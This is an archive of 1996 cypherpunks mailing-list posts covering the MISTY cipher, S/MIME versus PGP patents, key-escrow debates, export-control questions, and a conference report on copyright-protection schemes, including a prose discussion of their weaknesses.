>
>

Thanks for the feedback, Eric Verheul






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 10 Oct 1996 06:14:06 -0700 (PDT)
To: cypherpunks@toad.com
Subject: MISTY Algorithm
Message-ID: <1.5.4.16.19961010131225.3687f114@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Nikkei Industrial Daily, October 08, 1996


Mitsubishi publicizes MISTY encryption algorithm 


Mitsubishi Electric Corp. said it has released the design 
principles for its data encryption algorithm MISTY. In 
doing so, the company can enlist third-party users to 
evaluate the integrity and power of its encryption 
algorithm and gain wider name recognition for MISTY.


To make evaluations easier, the company is also providing 
a sample program.


The existing de-facto world standard encryption algorithms 
DES and RSA were both developed in the U.S. But MISTY has advantages of its
own and Mitsubishi would like 
encryption experts around the world evaluate the program.


[End]


No information given on the source for the algorithm
or sample program. Anyone with the info care to share?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@cs.berkeley.edu>
Date: Thu, 10 Oct 1996 09:19:42 -0700 (PDT)
To: Steve Schear <azur@netcom.com>
Subject: Re: pgp, edi, s/mime
In-Reply-To: <v02130501ae825f741356@[10.0.2.15]>
Message-ID: <325D21FD.75BFB75B@cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


> How will users be made confident that the S/MIME crypto isn't somehow
> compromised in these products?  Vendor trust (I think not, with all the
> government pressures)?

First, the S/MIME _spec_ is a matter of public record. In addition,
RIPEM is a free software, source code available, implementation of
S/MIME's crypto parts. So if you use RIPEM, you're in pretty much the
same position as using PGP (which, unfortunately, includes the
ease-of-use issues).

But how can you be sure that _any_ software does what it's supposed to
do? As someone (I don't remember who) pointed out a few days ago,
Kerberos 4 was available in source form for a long time, and it had a
really weak PRNG.

How many people have really looked critically at the PGP 2.6.2 sources?
The key management code, in particular, is pretty bad. I didn't find any
actual bugs (I wasn't looking for them - I was just trying to understand
how it worked), but it didn't leave me with much confidence that it's
completely robust code.

At least with products like Netscape, money is being spent on quality
assurance.

You've raised a good question here. It's just that there are no easy
answers.

Raph




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Thu, 10 Oct 1996 06:57:36 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Future of Money Hearings
Message-ID: <v03007818ae82a9b8f4f8@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text


Date: Wed, 9 Oct 1996 19:49:50 PT
From: "Paul Lampru, Marketing Manager, Electronic Commerce Products,
Strategic Marketing, ATL,
 770-640-3688" <PAUL_L2@sfov1.verifone.com>
Subject: Future of Money Hearings
To: e-payments@commerce.net
Organization: VeriFone
X-PS-Qualifiers:
 /FONT=Courier-Bold/LINES=66/LEFT_MARGIN=36/CALCULATE/TOP_MARGIN=36/BOTTOM_MARGI
N=36
MIME-version: 1.0
Sender: owner-e-payments@commerce.NET
Precedence: bulk

+--------------------------------------------------+
Addressed to: e-payments@commerce.net
+--------------------------------------------------+

All:

Last June, Denis Calvert, VP for US Sales for VeriFone presented testimony
to Rep Castle's Banking Subcommittee.  This testimony suggested a strategy
that would enable Internet payment schemes...that develop naturally for the
Internet over the next couple of years...to be used by merchants who have
store fronts or cash register sales systems.  This strategy touches chip
cards, public key certification authorities, Stored Value Cards, and the
migration away from magnetic stripe technology toward chip cards or PC
Cards or whatever electronic token is appropriate.  This strategy also
touches on the potential use of the Internet by US Treasury to
distribute welfare payments and other Federal Transfer Payments.  This
strategy is a hypothetical scenario that leverages the MC/Visa SET payments
protocol, but does not effect the protocol or its use for credit card
payments on the Internet.

This strategy is gaining the attention of a number of Federal agencies.
Before this gets too far down the road...PLEASE review this testimony and
critique the strategy.  The testimony may be found at the following URL:

http://www.house.gov/castle/banking/calvert.htm

Please suggest a forum that these ideas may be presented and explained in
more detail than they can be explained in Mr. Calvert's testimony...or this
Email message.

Thank you...pdl

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This message was sent by e-payments@commerce.net.  For a complete listing
of available commands, please send mail to 'majordomo@commerce.net'
with 'help' (no quotations) contained within the body of your message.

--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"The cost of anything is the foregone alternative" -- Walter Johnson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "geeman@best.com" <geeman@best.com>
Date: Thu, 10 Oct 1996 08:54:06 -0700 (PDT)
To: "'perry@piermont.com>
Subject: RE: Swan song...
Message-ID: <01BBB68D.BB091840@geeman.vip.best.com>
MIME-Version: 1.0
Content-Type: text/plain


Excellent.
Thank you - you do a great service to  ...er, many.
I hope to join you.

----------
From: 	Perry E. Metzger[SMTP:perry@piermont.com]
Sent: 	Wednesday, October 09, 1996 8:01 PM
To: 	cypherpunks@toad.com
Subject: 	Swan song...


Well, folks, after four or five years here, I'm finally leaving.

I've picked this moment for two reasons.

First, the signal to noise ratio here is now too low to be measured
without expensive lab equipment -- as bad as Usenet, or even worse.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David Lesher / hated by RBOC's in 5 states" <wb8foz@wauug.erols.com>
Date: Thu, 10 Oct 1996 06:32:23 -0700 (PDT)
To: cypherpunks@toad.com (Cypherpunks)
Subject: Re: Netscape does the right thing (fwd)
Message-ID: <199610101332.JAA13826@wauug.erols.com>
MIME-Version: 1.0
Content-Type: text/plain


Lucky Green sez:
> Egghead has 128 bit Navigator 3.0 on sale for $29. You heard me right. The 
> clerk at Egghead, speaking broken English, failed to ask me for my passport.

Good Point. If Peter Junger is supposed to maintain a chain of
custody in his class; must not the bookstores, ComputerLands, you
name it, ALSO do the same -- restricting not just customers, but
non-AmCit employees' access...?


-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: listprep@rand.org
Date: Thu, 10 Oct 1996 09:50:26 -0700 (PDT)
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199610101650.JAA12056@toad.com>
MIME-Version: 1.0
Content-Type: text/plain




































From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@cs.berkeley.edu>
Date: Thu, 10 Oct 1996 09:51:19 -0700 (PDT)
To: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Subject: Re: pgp, edi, s/mime
In-Reply-To: <199610091521.KAA26969@wpg-01.escape.ca>
Message-ID: <325D296E.796D3740@cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


Andrew Loewenstern wrote:
> 
> Raph Levien writes:
> >  In sum, S/MIME leaves PGP in the dust, both techically and as
> >  a market force.
> 
> But does S/MIME still leave important sender and recipient information in the clear?

No. That's fixed.

> True, PGP is four years old and isn't as up-to-date anymore, but PGP 3.0 is
> supposed to have an important feature (although we will have to wait a year
> for it):  it is unencumbered by patents.

I'll believe in PGP 3.0 when I see it. Last time I checked in with the
development process, it was in pretty bad shape. Hopefully, the roughly
$5M of capitalization for PGP Inc. will help, but then again, when's the
last time an infusion of funds fixed a troubled software project?

In their present forms, PGP and S/MIME don't differ much in terms of
patents. At the _protocol_ level, both PGP and S/MIME require the use of
RSA cryptography, which is patented in the US. Similarly, at the
implementation level, both PGP 2.6.2 and RIPEM 3.0 (now in beta) have a
license to use RSAREF for noncommercial applications. If you want to use
RSA for commercial use in the US, you either have to buy ViaCrypt PGP
(whatever that's called now), or one of the commercial S/MIME
implementations. In either case, you're still paying for an RSA license.

Actually, the situation with PGP is even worse, as it includes the IDEA
cipher, which is patented by Ascom Tech. Ascom holds patents outside the
US, which means that commercial users of PGP outside the US must pay an
additional patent royalty to use PGP (US$15 per user for single copies
-- see Stale Schumacher's PGP FAQ for more details). By contrast, the
only patented algorithm required by the S/MIME protocol spec is RSA,
which is patent-free outside the US.

On 20 Sep 2000, S/MIME will become completely patent-free all over the
world.

S/MIME also requires the use of RC2, which is not patented, although RSA
may assert rights under trade secret law. This is still a bit
controversial, and the issue of inclusion of RC2 in RIPEM has not been
fully resolved yet. However, RSA has indicated a willingness to allow at
least object code for RC2 to be released as part of the RIPEM
distribution. The RC2 algorithm is only for compatibility with crippled
"export" implemenations of S/MIME, and can be omitted if you're only
ocmmunicating with non-crippled clients. (It should be noted that such a
version would not be in compliance with the S/MIME implementation
guide).

I think you're referring to the possibility that PGP 3.0 may use a
public key algorithm other than RSA. However, if this is the case, it
won't be compatible with PGP's installed base. In addition, I don't
believe that there has been a public key encryption algorithm proposed
which is free of patent controversy.

Raph




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 10 Oct 1996 09:55:53 -0700 (PDT)
To: blanc <cypherpunks@toad.com>
Subject: RE: legality of wiretapping: a "key" distinction
Message-ID: <199610101654.JAA24509@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:54 PM 10/9/96 -0700, blanc wrote:
>From:	Black Unicorn [in reply to Vlad the Conqueror]
>
>I understand that it's difficult for you to grasp how firmly entrenched
>the concept of wiretapping is in law enforcement, courts and the
>legislature, and that your novel new approach has been tried before.
>..................................................................
>
>This should help him understand it.   I won't say who this quote is from, 
but he was a very respected French author:
>	"Both the English and the Americans have kept the law of precedents; that 
is to say, they still derive their opinions in legal matters and the 
judgements they should pronounce from the opinions and legal judgements of 
their fathers. [...]


Unicorn's response was inadvertently hilarious.  He says that wiretapping is 
"firmly entrenched" in law-enforcement, but the truth is that it was 
"firmly entrenched" long before it was even legal!

Ironically he said it, despite the fact that wiretapping is comparatively 
rare.  Perjury, "drop guns," faking and planting evidence, accepting bribes, 
strongarming suspects, and similar techniques are probably far more commonly 
used than wiretapping ever was, but I don't see Unicorn describing those as 
"firmly entrenched" even though that would be an accurate characterization.


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JMKELSEY@delphi.com
Date: Thu, 10 Oct 1996 07:18:03 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Copyright protection schemes discussed at ESORICS
Message-ID: <01IAH35UBTVM8WYQA7@delphi.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

[ To: cypherpunks, sci.crypt ## Date: 10/08/96 01:05 pm ##
  Subject:  Copyright protection schemes discussed at ESORICS ]

Last week, I returned from the ESORICS conference in Italy.  (If
you're going to have a computer security conference, Rome is a nice
place for it.)  I've been busy since then, but I wanted to post
something about a panel discussion held there about copyright
protection in the electronic world.

This is all a little fuzzy in my memory, since it's been about two
weeks and my notes aren't terribly detailed.  However, I think the
discussion's contents will be of interest to a lot of people out
there working at the interface between cryptography and politics.

There were three people involved in the presentation:

1.   Gerard Eizenberg (chairing the discussion)
2.   Dominique Gonthier (from the European Commission)
3.   Alstair Kelman (a lawyer from the UK specializing in computer
                     and copyright issues)

Jean-Jacques Quisquater was supposed to be there, but had to cancel
(I think he was ill).

The basic problem they're trying to solve is that it's very hard to
conditionally control access to digital information.  It's not too
hard to keep me from ever seeing some piece of information (encrypt
it with a key I can't guess and a cipher I can't break), but it *is*
hard to keep me from giving a copy to a few hundred friends and
acquaintances, once I *have* seen it.  The solutions they proposed
(and I can't think of anything better) centered around two ideas:

1.   Embedding identification codes into the digital information which
are hard to remove, but easy for the authorities to detect.  (They
call this ``tattooing.'')  This allows the authorities or copyright
holders to trace the source of illegal copies.  (This is a little
like asking for the user's name and phone number during software
installation--it makes things a little less convenient if he later
wants to give away copies to all his friends.)

2.   Providing users with access to the information only on hardware
controlled by the copyright holder or people working in his
interests.  (They call this the ``black box.'')  This black box is
sold or given away to users to allow them to have limited access to
copyrighted data, and presumably goes through various gyrations to
make sure that the user continues to pay for what he gets.  The
market for these would probably be similar to the market for
satellite decoder boxes.  (I don't think the system would be hard to
design intelligently, though there would be a lot of opportunity for
implementation errors.)

Some of the interesting comments I recall from Mr. Gonthier:

1.   The ultimate solution to this problem will have to involve
technical, legal, and political methods.

2.   Not every country in Europe (let alone the world) recognizes
the same kind of rights with regard to copyright.

3.   The solution will have to involve published and well-accepted
standards--if we wind up with a dozen noninteroperable systems, then
they will probably all fail in the marketplace.

4.   The current solution is basically that owners of really
valuable content don't make it electronically available.

5.   Either people plan out a solution, or they wait and see what
kind of market-driven solutions emerge.  Mr. Gonthier favored the
first approach, and appeared to take it as a given that almost
everyone else would, too.  (I suppose if he didn't feel this way, he
would be in some other line of work....)

Some of the interesting comments I recall from Mr. Kelman:

1.   Copyright law isn't terribly well designed, and there are lots
of ambiguities.  It's going to be impossible to try to make
automated systems that make the kinds of judgements that are
currently done over several days or weeks, in court.

2.   Some of the ambiguities in copyright law get much worse with
digital systems.

3.   There are serious privacy implications in many of the solutions
discussed here.  Is it acceptable to have someone have a list of
every movie you've rented and every book you've bought or checked
out of the library?  Is it okay if they sell that list to (say) the
government, people who might want to sell you things, people who
might want to sue you, etc?

4.   The system has to be expensive to start breaking.  If we put
out an easy-to-break system now, and successively harder-to-break
ones later, then we train and provide capital for people who break
the copyright systems for money.  This is essentially what happened
with satellite decoder boxes.

Mr. Eizenberg made some interesting points, but since they were
mostly technical, I didn't take a lot of notes.  (I already have
thought about the technical side--it's the political and legal side
that I don't understand so well.)  One comment of his I *do*
remember, which I thought was an excellent point, was that
electronic commerce systems were a prerequisite for electronic
copyright management systems, and that the properties of those
electronic commerce systems would constrain what was possible for
the electronic commerce systems.  (For example, if your commerce
system doesn't support anonymous payments, then it's going to be
very hard to support the anonymous purchase of books in the
copyright management systems.)

I thought the discussion was very interesting, though I wish there
had been more time for questions and discussion.

My main comments are:

Political/social:

1.   I think the privacy issues are potentially monstrous,
especially when we add in consideration of billing records.  We have
to worry, not only about police-state measures (``lock up everyone
who has purchased more than three books on this list''), but also
about blackmail (``gee, Senator, I suppose you read `Naughty Boys in
Leather' each month for their incisive political commentary.'').

2.   Item 1 becomes more problematic when we consider the likely
unwillingness of many governments to accept any kind of anonymous
payment system that they can't trace.  How many people think it
would be okay for the government to have access to a list of what
books you read, so long as they promised not to misuse it?

3.   The ``tattooing of copyrighted data is really only interesting
if the tattoo can be used to trace the person who made the illegal
copies in the first place.  This also relates to item 1.

4.   Many countries have restrictions on what their citizens can
read.  This includes not only places like China, Iran, and
Singapore, but also places like the US, Canada, the UK, Germany, and
France.  It seems unlikely that the copyright management system
would be acceptable to many of these governments, if it ignored
these restrictions.  However, we're publishing the standards for how
these are to work--so with a little extra work, each country can
have their own implementation.  The US version can restrict what we
consider to be hardcore pornography (though someone will probably
have to come up with a usable definition of this term), the French
version can keep its citizens from watching too many American-made
movies, and the Chinese system can prevent citizens from reading or
watching anything with unacceptable political or social commentary.
After the election of the Buchanan administration in 2000, the US
version can even be modified (if designed well) to restrict the
number of non-English-language movies and books you can see/read.
Even if the US doesn't misuse this system, we'll be providing every
dictator on Earth with a turnkey system for tracking or censoring
what his citizens read and watch.

Technical:

1.   For most ways I can see these systems being built, the initial
cost to break the system will be somewhat high, but the marginal
cost per piece of copyrighted data extracted will be relatively low.
This means that it may pay for someone to break one box, then buy a
large number of movies, books, etc., and then, all at once, start
offering to sell them.  Each sale is available for only a few hours,
so they don't have to worry about preventing people from making
further copies too much.  So long as there is any way they can do
this (and if there's not, it means that anonymous cash and
communications have been totally stamped out), they can make a nice
profit on this stuff.  If I were designing this system, I'd probably
build in the ability to lock out the box that had violated the
rules, if I could identify it--hence, the plan to buy up lots of
titles, and only *then* to sell them.

2.   The simplest attack on this kind of system is what I'd call an
``end-run'' attack--we do an end-run around their defenses.  In the
case of music, books, and movies, this is done by digitizing the
output from the tamper-resistant viewing machine, and then making as
many copies as we like.  The cost for this attack is
     a.   A one-time cost for building the equipment to intercept
     and digitize the output.
     b.   A marginal cost per batch of sales--for each batch of
     sales we do, we probably lose the ability to buy anymore
     copyrighted items with that black box.  Thus, we have to be
     able to buy a new black box with the revenues from each pirate
     sale, plus eventually pay back what we spent buying or building
     the machine.
     c.   A marginal cost per item--we pay what all other consumers
     pay.

Note that (a) shouldn't be *that* much money, though it will almost
certainly be illegal in many places to have or sell such equipment.
For many designs of the black boxes, we just intercept the video
signal coming out of the box, which is trivial.

For (b), we have to either buy the black boxes under a false name,
or buy them somewhere that doesn't have much of a penalty for
hacking them and won't extradite us somewhere that does have a harsh
penalty for it.  If people demand too much proof of identity before
they'll sell you a black box, then they'll find it impossible to
sell many of them.  (Would you buy a television if they required
three forms of ID, a fingerprint, and a blood sample?)

3.   Ross Anderson's eternity service would obviously destroy this
system.  However, this is overkill.  It takes only one country which
is connected to the net, and which doesn't enforce laws against
electronic copyright violations, to ruin the whole system.

This raises an interesting point that's been raised many times
before:  What do you suppose will happen to countries that don't
enforce these laws?  I suspect the US and other countries will see
countries that don't enforce these laws as damaging their interests,
and will act accordingly.  Some precedents include US threats to
start a trade war with China over failure to protect copyright, and
a long list of US interventions into Central and South American
governments that did things we didn't like, i.e. Argentina,
Nicaragua, Panama.  (I'm sure other countries have done similar
things, but being from the US, these are the cases I'm familiar
with.)

Comments?

Note:  Please respond via e-mail as well as or instead of posting,
as I get CP-LITE instead of the whole list.

   --John Kelsey, jmkelsey@delphi.com / kelsey@counterpane.com
 PGP 2.6 fingerprint = 4FE2 F421 100F BB0A 03D1 FE06 A435 7E36

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMl0BT0Hx57Ag8goBAQEOwQQA4Al1gU2aKfDRK7FLCdsJWAzmbR2bmB9I
QwDMhmg102EclIU6R8powRICFgo6b2XsBkKaUJx3lEArqQ19SjPg5k2EM0Eyd4nO
dtaNUggRRY+zaG1DhYK6gAlHS3paG5L+vYnXjo21Bt9FUUQO+KQd/TK/Qk77C6Hh
zWP6DBF5B2s=
=pCAE
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Thu, 10 Oct 1996 23:01:58 -0700 (PDT)
To: Andrew Loewenstern <m5@tivoli.com
Subject: Re: Microsoft CAPI
Message-ID: <199610110558.WAA24031@mail1.best.com>
MIME-Version: 1.0
Content-Type: text/plain


Mike McNally writes:
>>  And so what happens when the Microsoft key is compromised?
>>  It might be hard to break by purely cryptographic means, but
>>  surely there are some people at Microsoft who aren't
>>  millionaires.

At 03:13 PM 10/9/96 -0500, Andrew Loewenstern wrote:
> I ask:  "Who Cares?"  It is easy enough to distribute with the
secure-non-GAK  
> plug-in a patch for disabling the module authentication.  Heck, you could  
> even make an ActiveX applet that did it.


Better than disabling, would be to give the user the choice of whose
signature to trust.  Perhaps many users would prefer a crypto engine signed
by Zimmerman, rather than Microsoft.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kip DeGraaf <kip@monroe.lib.mi.us>
Date: Thu, 10 Oct 1996 07:42:43 -0700 (PDT)
To: cypherpunks@toad.com
Subject: What are the flaws with FV payment system?
Message-ID: <Pine.SUN.3.91.961010103809.463D-100000@monroe.lib.mi.us>
MIME-Version: 1.0
Content-Type: text/plain


I only received this an hour ago.  I would very much like to attend, but 
can't put my fingers on the detailed analysis of FV's flaws in their 
system, which I would like to bring up in person at this seminar.  

Could someone please point me in the right direction?

---------- Forwarded message ----------
Date: Thu, 10 Oct 1996 09:51:56 -0400
From: Sue Davidsen <davidsen@umich.edu>
To: michlib-l@mlink.hh.lib.umich.edu
Subject: Seminar Announcement

Commerce on the Internet
7:00 PM Thursday, October 10, 1996
Room N130 New Business Building, MSU

Dr. Nathaniel Borenstein, Chief Scientist, First Virtual Holdings, Inc., is
known worldwide as a leading developer of Internet technologies, including
the MIME standard and the First Virtual Payment System.

In this presentation on commerce on the Internet he will discuss:

... The limitations of current encryption schemes
... The technical aspects of the First Virtual payment scheme
... The future of commerce on the Internet

Dr. Borenstein contributed to the development of numerous Internet
technologies  including the MIME standard (used for email attachments
and Web content typing), Andrew, metamail, ATOMICMAIL, and Safe-Tcl.
Dr. Borenstein devised the First Virtual payment system, a popular
mechanism for conducting commerce on the Internet. 

[a lot of cute biographical details left out, I'm not impressed]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 10 Oct 1996 10:48:40 -0700 (PDT)
To: Eric Verheul <cypherpunks@toad.com>
Subject: Re: AW: Binding cryptography - a fraud!
Message-ID: <199610101746.KAA28742@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:05 AM 10/10/96 +-100, Eric Verheul wrote:

>>I am at the same time dismayed and disgusted at the tendency of some 
>people
>>to want to "detect fraud" on the part of ordinary citizens, as this paper
>>appears to want to do, but says _nothing_ about preventing fraud
>>_by_government.  How is the average citizen to know if keys are being 
>given
>>out to government agents for valid reasons?
>
>First of all, that (and the legitimacy of "wiretaps" in general) is 
>something that should
>be regulated in national law (including procedures, checks and balances, 
>penalities).

Procedures which aren't followed.  Checks and balances which don't.  
Penalties which aren't enforced, etc.  That sort of thing?  Why not spend 
your time working on a system to enforce the law...AGAINST THE GOVERNMENT!

> Maybe
>you have the opinion that that is impossible to achieve, [or at least that 
>making wiretapping
>as such by government impossible is the only satisfactory way of doing it 
>(-; ]. 

Currently that's the best way, and it may turn out to be the only way.

>Our concept
>assumes that it is possible and acceptable, although legislation (and 
>especially appliance of
>it) in some countries might be improved..

But it won't be, and you know that.  And if anything, the system you've 
described seems to be intended to allow governemnts to become even more 
restrictive.  Currently, one of the problems facing government is that even 
if they want to illegalize non-escrowed encryption, they can't easily do it 
because escrowed encryption would be faked, or super-encrypted or...    Give 
them a tool to figure out who'se using "espionage-enabled" encryption, and 
you've practically invited them to illegalize all other forms.

Is that really a step forward?  Or a few giant steps backwards?  I think 
it's the latter.  Why strengthen their hand?  Why help them tyrannize us?

>
>Second, the concept is flexible in the choice of Trusted Retrieval Parties; 
>we have the opinion
>that if you don't trust the existing TRPs then, hey, setup your own TRP. We 
>believe that should be possible (and forsee serveral "privacy-protecting" 
>organisations doing so). However, as you don't
>want to have criminals setting up TRPs, some legislation on this point 
>should be made...

What about a "TRP" operated by an organization which says, in effect, that 
they don't believe that wiretapping is constitutional, so until it's proven 
to their satisfaction they're going to refuse all requests for keys?  
They're not "criminals", right?  But if legislation forces them to do what 
they consider the wrong thing, just how "wrong" does it need to get before 
they can refuse?

In addition, I object to the concept of wiretapping without informing those 
tapped.  Part of these "escrowed-encryption"/GAK proposals is usually a 
statement that keys will be released to the government without informing 
those targeted.  If this system is truly "voluntary" why can't I insist on 
being informed?


>Finally, as said in the announcement:
>"In [VKT], we explain how we envision the framework in which the binding
>concept could present a security tool in the information society."

Thumbscrews could also be considered "a security tool."  Right?!?


>>I am further enraged by the last portion of the paragraph above where he
>>says, "fraud can be properly discouraged _and_punished_"  Why "punished"? 
>>Why call it "fraud"?  Why should sending the "wrong" bits become a crime? 
>>The US government, for example, has repeatedly claimed that key-escrow
>>systems should be "voluntary."  Presumably, except for authoritarian and
>>totalitarian countries, no other country should force their own citizens 
>or
>>others to use any sort of key-escrow/GAK system.
>
>Wait a minute. It is a *voluntary* system, but it has some rules that 
>apply. The whole
>idea here is: if you don't like it, use your own system. "Fraude" refers to 
>using the
>system without sticking to its rules, maybe fraude has a wrong connotation.

Well, you'd better be careful about your terms.  But the term "voluntary" is 
really far more troublesome at this point than "fraud."   "Voluntary" 
implies no coercion, but when the US government enforces laws against 
encryption exports UNLESS a company agrees to develop GAK'd systems, how 
"voluntary" is that, really?   I'd say that the system isn't intended to be 
"voluntary" at all, but it's intended to look that way, sorta, in a somewhat 
darkened room if you squint real hard.

It's the "1984" version of "voluntary", right?


>>Maybe I'm biased:  I'm a libertarian who believes that sending the wrong
>>bits shouldn't be considered a crime.  The problem we have is with the
>Depends, it might be childrens pornography. The information society is 
>*not* about bits, but about information.

Under the circumstances, I can't support ANY such prohibitions.  All of the 
"usual suspects" are being dragged out just to be able to support GAK.  The 
real goal is tyranny, not the elimination of "drug smuggling, terrorism, 
organized crime,  child pornography, etc."  


>>politicians, NOT primarily the criminals.  Giving the government the 
>ability
>>to punish people merely for sending the wrong bits (absent some other, 
>REAL
>>crime) is an enormous step backward.  And if they're guilty of a real 
>crime,
>>why bother about the bits?
>In a democratic country one needs evidence to convict someone.

Wishful thinking, I see.    You also need a crime, right?  Well, make the 
use of non-GAK'ed encryption a crime, and there you have a crime!  Make it 
easy to detect use of non-GAK'd encryption (as you are doing) and you've 
send us all down a short road to an authoritarian or even a totalitarian 
government.


>>Even if I believed in GAK, which I don't, I don't think governments or
>>anyone else should be able to determine whether the "correct" code is
>>included with the data until and unless the government has a valid 
>warrant,
>Code is checked (on protocol compliance) by third parties all the time. 
>They
>should not get any wiser from it, that is the point

No, the government's ability to verify GAK'd software without the decrypt 
key allows them to focus their harassment/enforcement on those who choose to 
be different and not fit in.  Ask your parents or grandparents about yellow 
stars and pink triangles, if you have any doubts that governments want their 
primary targets to be easily identifiable.  

I believe that the government should absolutely NOT have the ability to know 
who is using "GAK-ok" software.  If they get what they believe is the key 
and it doesn't work, they'll know soon enough.  They're no worse off than 
they were before, are they?

The only think your invention is going to do is to help the government ban 
good encryption.






Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous@miron.vip.best.com
Date: Thu, 10 Oct 1996 10:59:42 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Tim May is a fine person.
Message-ID: <199610101757.KAA00401@miron.vip.best.com>
MIME-Version: 1.0
Content-Type: text/plain


Tim May's support of cryptography is an example of his
typically irreproachable behavior and exquisite maners
and above all his superior consideration. Indeed, Tim May
is a lord amoung lords, the most illustrious of them all.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: <rollo@artvark.com> (Rollo Silver)
Date: Thu, 10 Oct 1996 10:04:13 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Why not PGP?
Message-ID: <v03007804ae82d4baa7bb@[206.183.203.4]>
MIME-Version: 1.0
Content-Type: text/plain


I have a basic puzzlement about this whole war over strong crypto and key
escrow. I admit to being relatively crypto unsavvy, but with a strong (but
not avid) interest in the subject. Schneier sits on my bookshelf, and I
have cracked it a few times, but the prospect of studying it seriously
makes me feel slightly gut-sick.

I use PGP to communicate (presumably) strong-cryptoed messages to my
stepson Ray Hirschfeld in Amsterdam, and vice versa. He uses an
internationational version of PGP, and I use the domestic version that I
got from MIT. They seem to be compatible.

I don't intend to submit my present or future private PGP keys for key
escrow (Is that what's called GAK?). To protect myself against forgetting
my private key (which has happened once already) I'll no doubt some day put
it on a floppy and put the floppy in my bank safe deposit box.

Two questions:

1. Does anyone think that legislation might be passed which would
criminalize my communications with Ray?

2. Suppose someone writes a program Z that has no expicit crypto code in
it, but has hooks for installing one or another version of PGP. Given a
copy of Z, someone in this country could install PGP he got from MIT,
whereas someone in Europe could install the international version.
Would export of Z violate ITAR restrictions?

Rollo Silver / Amygdala | e-mail: rollo@artvark.com
216M N. Pueblo Rd, #107 | Website: http://www.artvark.com/artvark/
Taos, NM 87571 USA      | Voice: 505-751-9601; FAX: 505-751-7507






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Thu, 10 Oct 1996 08:07:53 -0700 (PDT)
To: Duncan Frissell <frissell@panix.com>
Subject: Re: "European Union Bank"
In-Reply-To: <3.0b19.32.19961009220915.00fdf69c@panix.com>
Message-ID: <Pine.SUN.3.91.961010110631.10410A-100000@tipper.oit.unc.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 9 Oct 1996, Duncan Frissell wrote:
> Internet Increase the Market Share of the Offshore Industry?"  Featuring
> "Lord Mancroft, Chairman, European Union Bank, Antigua."
> 
> I wonder if he'll be there.  If we are both there, I'll ask him.

You're asking an Estonian if someone's going to show up for something? 
:-) :-)

---
If I can get my key back,   it's Key Recovery
If you can get my key back, it's Key Escrow





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Thu, 10 Oct 1996 09:09:22 -0700 (PDT)
To: Raph Levien <raph@cs.berkeley.edu>
Subject: Re: pgp, edi, s/mime
In-Reply-To: <199610091521.KAA26969@wpg-01.escape.ca>
Message-ID: <9610101609.AA01024@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


Raph Levien writes:
>  In sum, S/MIME leaves PGP in the dust, both techically and as
>  a market force.

But does S/MIME still leave important sender and recipient information in the clear?

True, PGP is four years old and isn't as up-to-date anymore, but PGP 3.0 is  
supposed to have an important feature (although we will have to wait a year  
for it):  it is unencumbered by patents.


andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Murray <ericm@lne.com>
Date: Thu, 10 Oct 1996 11:31:43 -0700 (PDT)
To: rollo@artvark.com (Rollo Silver)
Subject: Re: Why not PGP?
In-Reply-To: <v03007804ae82d4baa7bb@[206.183.203.4]>
Message-ID: <199610101830.LAA22349@slack.lne.com>
MIME-Version: 1.0
Content-Type: text/plain


Rollo Silver writes:
 
